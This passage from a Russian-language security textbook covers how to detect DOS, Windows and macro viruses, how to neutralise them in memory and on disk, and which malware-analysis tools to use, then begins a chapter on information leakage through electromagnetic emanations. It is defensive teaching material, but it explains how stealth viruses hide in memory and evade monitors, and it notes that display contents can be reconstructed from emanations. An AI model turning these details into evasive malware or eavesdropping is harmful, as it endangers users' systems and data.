грузчика. Для того чтобы обнаружить такой вирус, в большинстве слу-
чаев достаточно отформатировать дискету на заведомо незараженном
компьютере, сохранить в виде файла ее boot-сектор, затем некоторое
время использовать ее на зараженном компьютере (записать/прочитать
несколько файлов), а после этого на незараженном компьютере сравнить
ее boot-сектор с оригинальным. Если в коде загрузочного сектора про-
изошли изменения - вирус пойман.
Существуют также вирусы, использующие более сложные приемы
заражения, например, изменяющие при инфицировании MBR всего 3
216
байта Disk Partition Table, соответствующие адресу активного загрузоч-
ного сектора. Для идентификации такого вируса придется провести бо-
лее детальное исследование кодов загрузочного сектора вплоть до пол-
ного анализа алгоритма работы его кода.
Приведенные рассуждения основываются на том, что стандартные
загрузчики (программы, записываемые операционной системой в загру-
зочные сектора) реализуют стандартные алгоритмы загрузки операци-
онной системы и оформляются в соответствии с ее стандартами. Если же
диски отформатированы утилитами, не входящими в состав DOS
(например, Disk Manager), то для обнаружения в них вируса следует
проанализировать алгоритм работы и оформление загрузчиков, создава-
емых такой утилитой.
Обнаружение файлового вируса
Как отмечалось, вирусы делятся на резидентные и нерезидентные.
Встречавшиеся до сих пор резидентные вирусы отличались гораздо
большим коварством и изощренностью, чем нерезидентные. Поэтому
для начала рассмотрим простейший случай - поражение компьютера не-
известным нерезидентным вирусом. Такой вирус активизируется при за-
пуске какой-либо зараженной программы, совершает все, что ему поло-
жено, передает управление программе-носителю и в дальнейшем (в от-
личие от резидентных вирусов) не будет мешать ее работе. Для обнару-
жения такого вируса необходимо сравнить длины файлов на винчестере
и в дистрибутивных копиях (упоминание о важности хранения таких ко-
пий уже стало банальностью). Если это не поможет, то следует побайтно
сравнить дистрибутивные копии с используемыми программами.
Можно также просмотреть дамп выполняемых файлов. В некото-
рых случаях можно сразу обнаружить присутствие вируса по наличию в
его коде текстовых строк. Многие вирусы, например, содержат строки:
".COM", "*.COM", ".EXE", "*.EXE", "*.*", "MZ", "COMMAND" и т.д.
Эти строки часто встречаются в начале или в конце зараженных файлов.
Существует и еще один способ визуального определения заражен-
ного вирусом файла. Он основан на том, что выполняемые файлы, ис-
ходный текст которых написан на языке высокого уровня, имеют вполне
определенную структуру. В случае Borland или Microsoft C/C++ сегмент
кода программы находится в начале файла, а сразу за ним - сегмент дан-
ных, причем в начале этого сегмента стоит строка-копирайт фирмы-
изготовителя компилятора. Если в дампе такого файла за сегментом
217
данных следует еще один участок кода, то вполне вероятно, что файл
заражен вирусом.
То же справедливо и для большинства вирусов, заражающих файлы
Windows. В выполняемых файлах этих ОС стандартным является раз-
мещение сегментов в следующем порядке: сегмент(ы) кода, за которыми
следуют сегменты данных. Если за сегментом данных идет еще один
сегмент кода, это также может служить сигналом о присутствии вируса.
Пользователям, знакомым с языком Ассемблер, можно попробовать
разобраться в кодах подозрительных программ. Для быстрого просмотра
лучше всего подходит HIEW (Hacker's View). Для более подробного изу-
чения потребуется дизассемблер - Sourcer или IDA.
Рекомендуется запустить одну из резидентных антивирусных про-
грамм-мониторов и следить за ее сообщениями о "подозрительных" дей-
ствиях программ (запись в COM- или EXE-файлы, запись на диск по аб-
солютному адресу и т.п.). Существуют мониторы, которые не только пе-
рехватывают такие действия, но и сообщают адрес, откуда поступил
"подозрительный" вызов (к таким мониторам относится AVPTSR.COM).
Обнаружив подобное сообщение, следует выяснить, от какой программы
оно пришло, и проанализировать ее коды при помощи резидентного ди-
зассемблера (например, AVPUTIL.COM). При анализе кодов программ,
резидентно находящихся в памяти, большую помощь часто оказывает
трассирование прерываний 13h и 21h.
Следует отметить, что резидентные DOS-мониторы часто оказыва-
ются бессильны, если работа ведется в DOS-окне под Windows95/NT, по-
скольку Windows95/NT позволяют вирусу работать "в обход" монитора
(как, впрочем, и всех остальных резидентных программ). DOS-мониторы
также неспособны остановить распространение Windows-вирусов.
Рассмотренные выше методы обнаружения файловых и загрузоч-
ных вирусов подходят для большинства как резидентных, так и нерези-
дентных вирусов. Однако эти методы не срабатывают, если вирус вы-
полнен по технологии "стелс", что делает бесполезным использование
большинства резидентных мониторов, утилит сравнения файлов и чте-
ния секторов.
Обнаружение резидентного вируса
Если в компьютере обнаружены следы деятельности вируса, но ви-
димых изменений в файлах и системных секторах дисков не наблюдается,
то вполне возможно, что компьютер поражен одним из "стелс"-вирусов. В
этом случае необходимо загрузить DOS с заведомо чистой от вирусов
218
дискеты, содержащей резервную копию DOS, и действовать, как и при
поражении нерезидентным вирусом. Однако иногда это нежелательно, а в
ряде случаев невозможно (известны, например, случаи покупки новых
компьютеров, зараженных вирусом). Тогда придется обнаружить и
нейтрализовать резидентную часть вируса, выполненную по технологии
"стелс". Существует несколько способов инфицирования памяти.
DOS-вирусы
1. Вирус может проникнуть в таблицу векторов прерываний
Лучший способ обнаружить такой вирус состоит в том, чтобы про-
смотреть карту распределения памяти, которая отображает список рези-
дентных программ (пример такой карты приведен рис. 35). Подробная
карта памяти сообщает информацию о всех блоках, на которые разбита
память: адрес блока управления памятью MCB, имя программы-
владельца блока, адрес ее префикс программного сегмента (PSP) и спи-
сок перехватываемых блоком векторов прерываний.
При наличии вируса в таблице векторов прерываний, утилиты,
отображающие карту распределения памяти (например,
AVPUTIL.COM), начинают "шуметь".
Рис. 35. Карта распределения незараженной памяти
219
Рис. 36. Таблица векторов прерываний поражена вирусом
Другой, более надежный, но требующий высокой квалификации
пользователя способ, - просмотреть таблицу векторов прерываний с по-
мощью дизассемблера. Если при этом будут обнаружены коды какой-то
программы, то код вируса (или участок кода) найден.
2. Вирус может несколькими способами встроиться в DOS: в произ-
вольный системный драйвер, в системный буфер, в другие рабочие
области DOS (например, в область системного стека или в свобод-
ные места таблиц DOS и BIOS).
Наиболее "популярным" способом инфицирования вирусом произ-
вольного системного драйвера является прикрепление тела вируса к
файлу, содержащему драйвер, и модификация заголовка поражаемого
драйвера. Если при этом вирус оформляет себя как отдельный драйвер,
то его можно обнаружить при просмотре карты распределения памяти,
содержащей список системных драйверов. Если при этом в списке при-
сутствует драйвер, который не описан в файле CONFIG.SYS, то он и
может быть вирусом. Если же вирус "приклеивается" к расположенному
перед ним драйверу, не выделяя свои коды как отдельную программу-
драйвер, то обнаружить его можно методами, описанными ниже.
Вирус, встраивающийся в системный буфер, должен уменьшать об-
щее число буферов; в противном случае он будет уничтожен последую-
220
щими операциями считывания с диска. Достаточно несложно написать
программу, которая подсчитывает число буферов, реально присутствую-
щих в системе, и сравнивает полученный результат со значением команды
BUFFERS, расположенной в файле CONFIG.SYS (если команда BUFFERS
отсутствует, то со значением, устанавливаемым DOS по умолчанию).
Существует достаточно способов внедрения вируса в системные
таблицы или область стека DOS. Однако реализация этих способов по-
требует от автора вируса досконального знания различных версий DOS.
К тому же свободного места в DOS не так уж много, и поэтому написа-
ние полноценного "стелс"-вируса такого типа маловероятно. Если же
все-таки подобный вирус появится, то обнаружить его код можно дизас-
семблированием "подозрительных" на наличие вируса участков DOS.
3. Вирус может проникнуть в область программ в виде:
отдельной резидентной программы или отдельного блока памяти (MCB);
внутри или "приклеившись" к какой-либо резидентной программе.
Если вирус внедряется в отведенную для прикладных программ об-
ласть памяти в виде нового блока, создавая для себя собственный MCB,
или как отдельная резидентная программа, то его можно обнаружить
при просмотре подробной карты распределения памяти, отображающей
адреса всех блоков MCB. Обычно такой вирус выглядит как отдельный
блок памяти (см. рис. 37), не имеющий имени и перехватывающий один
или несколько векторов прерываний (например, INT 8, 13h, 1Ch, 21h).
Следует отметить, что вирус может выделить себе блок памяти как в
обычной (conventional), так и в верхней памяти (UMB).
Рис. 37. Вирус в области пользовательских программ
221
4. Вирус может проникнуть за границу памяти, выделенной под DOS.
Адрес Адрес Размер Имя программы Номера векторов

блока PSP блока МСВ владельца прерываний
МСВ (Кб) блока МСВ
03D8 03D8 3,20 K COMMAND.COM 22, 24, 2E

047D 0000 0,04 K блок свободен
0482 03D8 0,15 K COMMAND.COM
0493 0493 23,20 K AVPTSR.COM 10, 1B, 23, 26, 27,28
2F, 40
08F5 03D8 618,64 K COMMAND.COM 30
A000 0008 136,09 K DOS
C13A - 1,20 K DOS
C186 - 54,96 K блок свободен
вирус “Tremor”, маскирующийся под блок DOS
Рис. 38. Вирус в области пользовательских программ (UMB)
222
Рис. 39. Уменьшение размера вирусов DOS-памяти
Практически все загрузочные и некоторые файловые вирусы распо-
лагаются за пределами памяти, выделенной для DOS, уменьшая значе-
ние слова, расположенного по адресу [0040:0013]. В этом случае первый
мегабайт памяти компьютера выглядит так:
Обнаружить такие вирусы очень просто - достаточно узнать емкость
оперативной памяти и сравнить ее с реальной. Если вместо 640K систе-
ма сообщит меньшее значение, то следует просмотреть дизассемблером
"отрезанный" участок памяти. Если на этом участке будут обнаружены
коды какой-то программы, то, скорее всего, вирус найден.
Пример такого распределения памяти приведен на рис. 40.
00000 Память DOS 00000 Память DOS
XXXX0h “Вырезанный” вирусом

участок памяти
A0000h Видео-память A0000h Видео-память
C0000h ROM BIOS C0000h ROM BIOS
Рис. 40. Распределение памяти зараженного компьютера

5. Вирус может встраиваться в конкретные, заведомо резидентные
программы или "приклеиться" к уже имеющимся блокам памяти.
Возможно инфицирование вирусом файлов DOS, которые являются
резидентными (например, IO.SYS, MSDOS.SYS, COMMAND.COM), за-
гружаемых драйверов (ANSY.SYS, COUNTRY.SYS, RAMDRIVE.SYS) и
др. Обнаружить такой вирус гораздо сложнее вследствие малой скоро-
сти его распространения, но, однако, вероятность атаки подобного виру-
са значительно меньше. Все чаще стали встречаться "хитрые" вирусы,
которые корректируют заголовки блоков памяти или "обманывают"
DOS таким образом, что блок с кодами вируса становится одним целым
с предыдущим блоком памяти.
В этом случае обнаружить вирус гораздо сложнее - необходимо
знать реальную длину программ, размещенных в памяти, и список пре-
223
рываний, которые они перехватывают. Но этот способ не очень удобен и
иногда не срабатывает. Поэтому рекомендуется использовать другой ме-
тод, который может облегчить выявление вируса в подобной ситуации.
Он основан на следующем свойстве - подавляющее большинство виру-
сов для обнаружения незараженных файлов или секторов дисков пере-
хватывает прерывания 13h или 21h, встраиваясь в обработчик прерыва-
ния. В таком случае для обнаружения вируса достаточно просмотреть
текст (команды ассемблера) обработчиков указанных прерываний
(например, при помощи программы AVPUTIL.COM). Правда для того,
чтобы отличить вирус от обычных программ, требуется достаточный
опыт работы с вирусами и некоторое представление о структуре обра-
ботчика на незараженном компьютере. К тому же следует быть осто-
рожным: существует несколько вирусов, которые "завешивают" систему
при попытке трассировки их кодов.
Известны вирусы, которые при заражении файлов или дисков не
пользуются прерываниями, а напрямую работают с ресурсами DOS. При
поиске подобного вируса необходимо тщательно исследовать изменения
во внутренней структуре зараженной DOS: список драйверов, таблицы
файлов, стеки DOS и т.д. Это является очень кропотливой работой, и,
учитывая многочисленность версий DOS, требует очень высокой квали-
фикации пользователя.
Конечно, существуют и другие, достаточно экзотические способы
инфицирования памяти вирусом, например внедрение вируса в видеопа-
мять, в High Memory Area (HMA) или в расширенную память (EMS,
XMS), но подобные вирусы встречаются достаточно редко и всегда про-
являлись хотя бы одним из перечисленных выше признаков. Существу-
ют также монстры, использующие защищенный режим процессоров i386
и выше. К счастью, известные вирусы такого типа либо "не живут" вме-
сте с современными операционными системами и поэтому слишком за-
метны, либо не используют стелс-приемов. Однако появление полно-
ценного стелс-DOS-вируса, работающего в защищенном режиме, вполне
реально. Такой вирус будет невидим для DOS-задач и обнаружить его
будет возможно, только либо перенеся зараженные файлы на незара-
женный компьютер, либо после перезагрузки ОС с чистого носителя.
Windows-вирусы
Обнаружение резидентного Windows-вируса является крайне слож-
ной задачей. Вирус, находясь в среде Windows как приложение или
VxD-двайвер, практически невидим, поскольку одновременно активны
несколько десятков приложений и VxD, и вирус по внешним признакам
224
от них ничем не отличается. Для того, чтобы обнаружить программу-
вирус в списках активных приложений и VxD, необходимо досконально
разбираться во "внутренностях" Windows и иметь полное представление
о драйверах и приложениях, установленных на данном компьютере.
Поэтому единственный приемлемый способ поймать резидентный
Windows-вирус - загрузить DOS и проверить запускаемые файлы
Windows методами, описанными выше.
Обнаружение макро-вируса
Характерными проявлениями макро-вирусов являются:
- невозможность конвертирования зараженного документа Word в
другой формат;
- зараженные файлы имеют формат Template (шаблон), поскольку
при заражении макро-вирусы конвертируют файлы из формата Word
Document в Template;
- невозможность записи документа в другой каталог/на другой диск
по команде "Save As";
- в STARTUP-каталоге присутствуют "чужие" файлы;
- наличие в Книге (Book) лишних и скрытых Листов (Sheets).
Для проверки системы на предмет наличия вируса можно использо-
вать пункт меню Tools/Macro. Если обнаружены "чужие макросы", то
они могут принадлежать вирусу. Однако этот метод не работает в случае
стелс-вирусов, которые запрещают работу этого пункта меню, что, в
свою очередь, является достаточным основанием считать систему зара-
женной.
Многие вирусы имеют ошибки или некорректно работают в раз-
личных версиях Word/Excel, в результате чего Word/Excel выдают со-
общения об ошибке, например:
WordBasic Err = номер ошибки
Если такое сообщение появляется при редактировании нового до-
кумента или таблицы и при этом заведомо не используются какие-либо
пользовательские макросы, то это также может служить признаком за-
ражения системы.
Сигналом о вирусе являются и изменения в файлах и системной
конфигурации Word, Excel и Windows. Многие вирусы тем или иным об-
разом меняют пункты меню Tools/Options - разрешают или запрещают
функции "Prompt to Save Normal Template", "Allow Fast Save", "Virus
Protection". Некоторые вирусы устанавливают на файлы пароль при их
225
заражении. Большое количество вирусов создает новые секции и/или оп-
ции в файле конфигурации Windows или системном реестре.
Естественно, что к проявлениям вируса относятся такие очевидные
факты, как появление сообщений или диалогов с достаточно странным
содержанием или на языке, не совпадающем с языком установленной
версии Word/Excel.
4.7. Методы восстановления пораженных объектов

Если же на компьютере действительно найден вирус, то надо сде-
лать следующее:
1. В случае обнаружения файлового вируса, если компьютер под-
ключен к сети, необходимо отключить его от сети и проинформировать
системного администратора. Если вирус еще не проник в сеть, это защи-
тит сервер и другие рабочие станции от проникновения вируса. Если же
вирус уже поразил сервер, то отключение от сети не позволит ему вновь
проникнуть на компьютер после его лечения. Подключение к сети воз-
можно лишь после того, как будут вылечены все сервера и рабочие
станции.
При обнаружении загрузочного вируса отключать компьютер от се-
ти не следует: вирусы этого типа по сети не распространяются (есте-
ственно, кроме файлово-загрузочных вирусов).
Если произошло заражение макро-вирусом вместо, отключения от
сети достаточно на период лечения убедиться в том, что соответствую-
щий редактор (Word/Excel) неактивен ни на одном компьютере.
2. Если обнаружен файловый или загрузочный вирус, следует убе-
диться в том, что вирус либо нерезидентный, либо резидентная часть
вируса обезврежена: при запуске некоторые (но не все) антивирусы ав-
томатически обезвреживают резидентные вирусы в памяти. Удаление
вируса из памяти необходимо для того, чтобы остановить его распро-
странение. При сканировании файлов антивирусы открывают их, многие
из резидентных вирусов перехватывают это событие и заражают откры-
ваемые файлы. В результате большая часть файлов окажется заражен-
ной, поскольку вирус не удален из памяти. То же может произойти и в
случае загрузочных вирусов - все проверяемые дискеты могут оказаться
зараженными.
Если используемый антивирус не удаляет вирусы из памяти, следует
перезагрузить компьютер с заведомо незараженной и защищенной от за-
писи системной дискеты. Перезагрузка должна быть "холодной" (клави-
ша Reset или выключение/включение компьютера), так как некоторые ви-
226
русы "выживают" при теплой перезагрузке. Некоторые вирусы использу-
ют приемы, позволяющие им "выжить" и при холодной перезагрузке (см.,
например, вирус "Ugly"), поэтому также следует проверить в настройках
BIOS пункт "последовательность загрузки A: C:", чтобы гарантировать
загрузку DOS с системной дискеты, а не с зараженного винчестера.
Помимо резидентности/нерезидентности полезно ознакомиться и с
другими характеристиками вируса: типами заражаемых вирусом файлов,
проявлениями и прочее.
3. При помощи антивирусной программы нужно восстановить за-
раженные файлы и затем проверить их работоспособность. Перед лече-
нием или одновременно с ним - создать резервные копии зараженных
файлов и распечатать или сохранить где-либо список зараженных фай-
лов (log-файл антивируса). Это необходимо для того, чтобы восстано-
вить файлы, если лечение окажется неуспешным из-за ошибки в леча-
щем модуле антивируса либо по причине неспособности антивируса ле-
чить данный вирус. В этом случае придется прибегнуть к помощи како-
го-либо другого антивируса.
Гораздо надежнее, конечно, восстановить зараженные файлы из
backup-копии (если она есть), однако все равно потребуются услуги ан-
тивируса - вдруг не все копии вируса окажутся уничтожены, или если
файлы в backup-копии также заражены.
Следует отметить, что качество восстановления файлов многими
антивирусными программами оставляет желать лучшего. Многие попу-
лярные антивирусы частенько необратимо портят файлы вместо их ле-
чения. Поэтому если потеря файлов нежелательна, то выполнять пере-
численные выше пункты следует в полном объеме.
В случае загрузочного вируса необходимо проверить все дискеты
независимо от того, загрузочные они (т.е. содержат файлы DOS) или
нет. Даже совершенно пустая дискета может стать источником распро-
странения вируса - достаточно забыть ее в дисководе и перезагрузить
компьютер (если, конечно же, в BIOS Setup загрузочным диском отме-
чен флоппи-диск).
Помимо перечисленных выше пунктов необходимо обращать особое
внимание на чистоту модулей, сжатых утилитами типа LZEXE, PKLITE
или DIET, файлов в архивах (ZIP, ARC, ICE, ARJ и т.д.) и данных в само-
распаковывающихся файлах-архивах. Если случайно упаковать файл, за-
раженный вирусом, то обнаружение и удаление такого вируса без распа-
ковки файла практически невозможно. В данном случае типичной будет
ситуация, при которой все антивирусные программы, неспособные ска-
227
нировать внутри упакованных файлов, сообщат о том, что от вирусов
очищены все диски, но через некоторое время вирус появится опять.
Штаммы вируса могут проникнуть и в backup-копии программного
обеспечения при обновлении этих копий. Причем архивы и backup-
копии являются основными поставщиками давно известных вирусов.
Вирус может годами "сидеть" в дистрибутивной копии какого-либо про-
граммного продукта и неожиданно проявиться при установке программ
на новом компьютере.
Никто не гарантирует полного уничтожения всех копий компьютер-
ного вируса, так как файловый вирус может поразить не только выполня-
емые файлы, но и оверлейные модули с расширениями имени, отличаю-
щимися от COM или EXE. Загрузочный вирус может остаться на какой-
либо дискете и внезапно проявиться при случайной попытке перезагру-
зиться с нее. Поэтому целесообразно некоторое время после удаления ви-
руса постоянно пользоваться резидентным антивирусным сканером.
4.7.1. Нейтрализация компьютерных вирусов
Методика нейтрализации:
 Обнаружение и блокирование активных руткитов. Проверить
наличие активных руткитов, используя разнообразные антирут-
киты. При выявлении руткитов деактивировать их.
 Изучение списка процессов и выявление имеющих отношение к
вредоносным.
 Блокирование работы вредоносной программы. Приостановить
действие процессов или потоков вредоносной программы или
завершить их исполнение. Выгрузить вредоносные библиотеки,
загруженные в другие процессы. Закрыть используемые вредо-
носной программой дескрипторы (handles).
 Блокирование автозапуска вредоносной программы. Выявить
точки автозапуска вредоносной программы. Удалить или отклю-
чить точки автозапуска вредоносной программы или ее компо-
нент. Убедиться, что вредоносная программа или ее компоненты
не восстановили свой автозапуск.
 Удалить вредоносную программу и ее компоненты. Удалить
вредоносную программу и ее компоненты, идентифицированные
в процессе обнаружения вредоносной программы. Удалить со-
зданные вредоносной программой ключи реестра. Удалить со-
зданные копии и другие компоненты вредоносной программы,
228
идентифицированные по результатам динамического анализа.
Используя антивирус или специализированные антивирусные
утилиты обезвредить зараженные файлы.
 Восстановить работоспособность системы. Восстановить си-
стемные файлы, испорченные вредоносной программой. Вернуть
стандартные значения ключей реестра, испорченных вредонос-
ной программой: Политики безопасности, Настройки Internet
Explorer, Вид файлов и папок в Windows Explorer и т.д.
 Выполнить полную антивирусную проверку компьютера по-
следней версией антивируса со всеми обновлениями. Цель: за-
чистка, уничтожение неактивных вредоносных программ: Email-
Worm.Win32.Rays.c создает свои исполняемые копии в папках
компьютера под именами, аналогичными именам файлов в этой
папке; P2P-Worm.Win32.Malas.j создает в shared-папках P2P-
клиентов файлы под привлекательными именами:
adobeupdate.exe, sexgame.exe и т.д.
Нейтрализация вирусов предполагает блокирование способности
вирусных программ к размножению и удаление их из файлов и памяти.
При организации обезвреживания вирусов руководствуются следующи-
ми положениями:
 лечению подлежат все без исключения зараженные файлы (во
всех каталогах всех логических дисков) и вся память;
 возможно многократное поражение файлов вирусами (нали-
чие вирусных "бутербродов");
 обработка фагом зараженного файла может привести к необ-
ратимым изменениям в нем;
 желательно сохранить файлы (особенно те, для которых нет
резервных копий).
Нейтрализация вируса осуществляется путем обработки заражен-
ных файлов (согласно составленному списку) подходящим фагом. Если
дезинфекция какого-то зараженного файла оказалась не вполне коррект-
ной, этот файл следует уничтожить и восстановить его с резервной ко-
пии. Если такая копия отсутствует, восстанавливается зараженный файл
и делается попытка дезинфицировать его другим фагом.
В простейшем варианте, когда имеются резервные копии к заражен-
ным файлам, можно удалить файлы-вирусоносители с жесткого диска и
дискет и тем самым прекратить дальнейшее распространение вируса.
229
Если нейтрализовать зараженный файл невозможно и есть его ре-
зервная копия, прибегают к простому и почти универсальному способу
лечения - уничтожению файла.
Полное уничтожение всех копий вируса трудно гарантировать и по-
этому для страховки некоторое время после проведения дезинфекции
работа на компьютере должна выполняться под контролем резидентного
антивирусного монитора.
4.7.2. Восстановление пораженных объектов
В большинстве случаев заражения вирусом процедура восстановле-

ния зараженных файлов и дисков сводится к запуску подходящего анти-
вируса, способного обезвредить систему. Если же вирус неизвестен, то
достаточно отослать зараженный файл фирмам-производителям антиви-
русов и через некоторое время (обычно - несколько дней или недель)
получить лекарство-"апдейт" против вируса.
Восстановление файлов-документов и таблиц
Для обезвреживания Word и Excel достаточно сохранить всю необ-
ходимую информацию в формате не-документов и не-таблиц - наиболее
подходящим является текстовый RTF-формат, содержащий практически
всю информацию из первоначальных документов и не содержащий мак-
росов. Затем следует выйти из Word/Excel, уничтожить все зараженные
Word-документы, Excel-таблицы, NORMAL.DOT у Word и все докумен-
ты/таблицы в StartUp-каталогах Word/Excel. После этого следует запу-
стить Word/Excel и восстановить документы/таблицы из RTF-файлов.
В результате этой процедуры вирус будет удален из системы, а
практически вся информация останется без изменений. Однако этот ме-
тод имеет ряд недостатков. Основной из них - трудоемкость конверти-
рования документов и таблиц в RTF-формат, если их число велико. К
тому же в случае Excel необходимо отдельно конвертировать все Листы
(Sheets) в каждом Excel-файле. Второй недостаток - потеря невирусных
макросов, используемых при работе. Поэтому перед запуском описан-
ной процедуры следует сохранить их исходный текст, а после обезвре-
живания вируса - восстановить необходимые макросы в первоначальном
виде.
Восстановление загрузочных секторов
Восстановление секторов в большинстве случаев является довольно
простой операцией и проделывается при помощи DOS'овской команды
230
SYS (загрузочные сектора дискет и логических дисков винчестера) или
командой FDISK/MBR (Master Boot Record винчестера). Можно, конеч-
но же, воспользоваться утилитой FORMAT, однако практически во всех
случаях команды SYS вполне достаточно.
Следует иметь в виду, что лечение секторов необходимо произво-
дить только при условии отсутствия вируса в оперативной памяти. Если
копия вируса в памяти не обезврежена, то вполне вероятно, что вирус
повторно заразит дискету или винчестер после того, как код вируса бу-
дет удален (даже если воспользоваться утилитой FORMAT).
Будьте также крайне осторожны при использовании FDISK/MBR.
Эта команда заново переписывает код программы-загрузчика системы и
не изменяет таблицу разбиения диска (Disk Partition Table). FDISK/MBR
является 100% лекарством для большинства загрузочных вирусов, одна-
ко, если вирус шифрует Disk Partition Table или использует нестандарт-
ные способы заражения, FDISK/MBR может привести к полной потере
информации на диске. Поэтому перед запуском FDISK/MBR убедитесь в
корректности Disk Partition Table. Для этого требуется загрузиться с не-
зараженной DOS-дискеты и проверить корректность этой таблицы.
Если же восстановление секторов при помощи SYS/FDISK невоз-
можно, то следует разобраться в алгоритме работы вируса, обнаружить
на диске первоначальный boot/MBR-сектор и перенести его на законное
место (для этого подходят Norton Disk Editor). При этом надо постоянно
иметь в виду, что при перезаписи системных загрузчиков необходимо
соблюдать особую осторожность, поскольку результатом неправильного
исправления сектора MBR или boot-сектора может быть потеря всей ин-
формации на диске (дисках).
Восстановление файлов
В подавляющем большинстве случаев восстановление зараженных
файлов является достаточно сложной процедурой, которую невозможно
произвести "руками" без необходимых знаний - форматов выполняемых
файлов, языка ассемблера и т.д. К тому же обычно зараженными на дис-
ке оказываются сразу несколько десятков или сотен файлов и для их
обезвреживания необходимо разработать собственную программу-
антивирус.
При лечении файлов следует учитывать следующие правила:
- необходимо протестировать и вылечить все выполняемые файлы
(COM, EXE, SYS, оверлеи) во всех каталогах всех дисков вне зависимо-
сти от атрибутов файлов (т.е. файлы read-only, системные и скрытые);
231
- желательно сохранить неизменными атрибуты и дату последней
модификации файла;
- необходимо учесть возможность многократного поражения файла
вирусом ("бутерброд" из вирусов).
Само лечение файла производится в большинстве случаев одним из
нескольких стандартных способов, зависящих от алгоритма размноже-
ния вируса. В большинстве случаев это сводится к восстановлению за-
головка файла и уменьшению его длины.
Дезактивация оперативной памяти
Процедура дезактивации памяти, как и лечение зараженных файлов,
требует некоторых знаний об операционной системе и обязательного
знания языка Ассемблер.
При лечении оперативной памяти необходимо обнаружить коды
вируса и изменить их таким образом, чтобы вирус в дальнейшем не ме-
шал работе антивирусной программы - "отключить" подпрограммы за-
ражения и стелс. Для этого требуется полный анализ кода вируса, так
как процедуры заражения и стелс могут располагаться в различных
участках вируса, дублировать друг друга и получать управление при
различных условиях.
В большинстве случаев для дезактивации памяти достаточно "обру-
бить" прерывания, перехватываемые вирусом: INT 21h в случае файло-
вых вирусов и INT 13h в случае загрузочных (существуют, конечно же,
вирусы, перехватывающие другие прерывания или несколько прерыва-
ний). Например, если вирус заражает файлы при их открытии, то это
может выглядеть примерно так:
Рис. 41. Пример деактивации компьютерного вируса

При дезактивации TSR-копии вируса необходимо помнить, что ви-
рус может предпринимать специальные меры для восстановления своих
кодов (например, некоторые вирусы семейства "Yankee" восстанавлива-
232
ют их при помощи методов помехозащищенного кодирования), и в этом
случае придется нейтрализовать и механизм самовосстановления вируса.
Некоторые вирусы, кроме того, подсчитывают CRC своей резидентной
копии и перезагружают компьютер или стирают сектора диска, если
CRC не совпадает с оригинальным значением. В этом случае необходи-
мо "обезвредить" также и процедуру подсчета CRC.
4.7.3. Инструменты, необходимые для обнаружения, анализа

и нейтрализации вредоносных программ
Инструменты обнаружения:
 Антируткиты AVZ и другие антируткиты;
 Процессы и память Process Explorer;
 Реестр Regmon (Windows 9x/2000/XP) Autoruns;
 Файловая система Filemon (Windows 9x/2000/XP); Сеть
TCPView Wireshark;
 Файлы, процессы, реестр, сеть Process Monitor (Windows
XP и выше).
Инструменты экспресс-анализа:
Файловая база данных Bit9 FileAdvisor
http://fileadvisor.bit9.com/ Проверка заданного файла по специ-
ализированным базам чистых (whitelist) и вредоносных
(blacklist) файлов
Веб-службы комплексной антивирусной проверки: VirusTotal
www.virustotal.com Комплексная проверка 32-мя антивируса-
ми; Jotti’s malware scan virusscan.jotti.org Комплексная провер-
ка 21-м антивирусом;VirSCAN www.virscan.org Комплексная
проверка 36-ю антивирусами.
Песочницы:
Threat Expert www.threatexpert.com Анализ поведения PE-
файлов в VMware;
Norman Sandbox
http://www.norman.com/microsites/nsic/Submit/en. Анализ
поведения PE-файлов в эмуляторе Norman Sandbox;
Sunbelt CWSandbox http://www.sunbelt-
software.com/Developer/Sunbelt-CWSandbox/ Анализ пове-
дения PE-файлов в реальной машине;
Wepawet http://wepawet.iseclab.org/. Анализ поведения JS-
и SWF-зловредов
Инструменты динамического анализа:
233
 Изолированная среда исполнения VMware Workstation: возмож-
ность создания «снимков состояния» виртуальной машины
(snapshots), возможность создания связанных клонов виртуальных
машин (linked clones), поддерживает функцию «Drag’n’Drop» фай-
лов в/из виртуальной машины, бесплатная испытательная версия
(30 дней) http://www.vmware.com/;
 Microsoft Virtual PC нет возможности создания «снимков состоя-
ния», поддерживает функцию «Drag’n’Drop» файлов в/из вирту-
альной машины, нет возможности создания связанных клонов вир-
туальных машин (linked clones), http://www.microsoft.com/
windows/downloads/virtualpc/default.mspx
 бесплатная Sun (Oracle)) xVM VirtualBox: возможность создания
«снимков состояния» виртуальной машины (snapshots), нет под-
держки функции «Drag’n’Drop» файлов в/из виртуальной машины,
нет возможности создания связанных клонов виртуальных машин
(linked clones) , http://www.sun.com/software/products/
virtualbox/index.jsp, бесплатная
Настройки безопасности изолированной среды исполнения:
 Отключение сетевого адаптера в гостевой операционной системе
во избежание «побега» вредоносной программы из изолированной
среды.
 При использовании ресурсов общего доступа (shared folders) уста-
навливать для них права доступа только на чтение из гостевой
операционной системы, чтобы избежать заражения файлов или со-
здания копий вредоносных программ в этих ресурсах.
Инструменты статического анализа:
PEiD Определение упаковщика исполняемого файла.
IDA Pro Free Дизассемблирование.
234
5. ПРОГРАММНО-АППАРАТНЫЕ СРЕДСТВА
ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ
БЕЗОПАСНОСТИ
5.1. Методы и средства защиты информации от утеч-
ки по каналам электромагнитных излучений и наводок
5.1.1. Особенности формирования каналов утечки
Работа средств вычислительной техники сопровождается электро-

магнитными излучениями и наводками на соединительные проводные
линии, цепи "питания", "земля", возникающими вследствие электромаг-
нитных воздействий в ближней зоне излучения, в которую могут попа-
дать также провода вспомогательной и посторонней аппаратуры. Элек-
тромагнитные излучения, даже если они отвечают допустимым техниче-
ским нормам, не являются безопасными с точки зрения утечки секрет-
ной информации и несанкционированного доступа к ней.
В некоторых случаях информацию, обрабатываемую средствами
ЭВТ, можно восстановить путем анализа электромагнитных излучений и
наводок. Для этого необходимы их прием и декодирование. Одно время
считалось очень трудным делом расшифровать информацию, содержа-
щуюся в излучении, и что поэтому восстановление информации после
приема под силу только профессионалам, располагающим очень слож-
ной аппаратурой обнаружения и декодирования. Однако исследования
показали, что восстановление информации от некоторых средств ЭВТ
возможно с помощью общедоступных радиоэлектронных средств. В
частности, при восстановлении информации с дисплеев можно исполь-
зовать обычный черно-белый телевизор, в котором сделаны незначи-
тельные усовершенствования. Если дисплей является элементом вычис-
лительной системы, то он может оказаться самым слабым ее звеном, ко-
торое сведет на нет все меры по увеличению безопасности излучений,
принятые во всех остальных частях системы.
Применение в средствах ЭВТ импульсных сигналов прямоугольной
формы и высокочастотной коммутации приводит к тому, что в спектре
излучений будут компоненты с частотами вплоть до СВЧ. Хотя энерге-
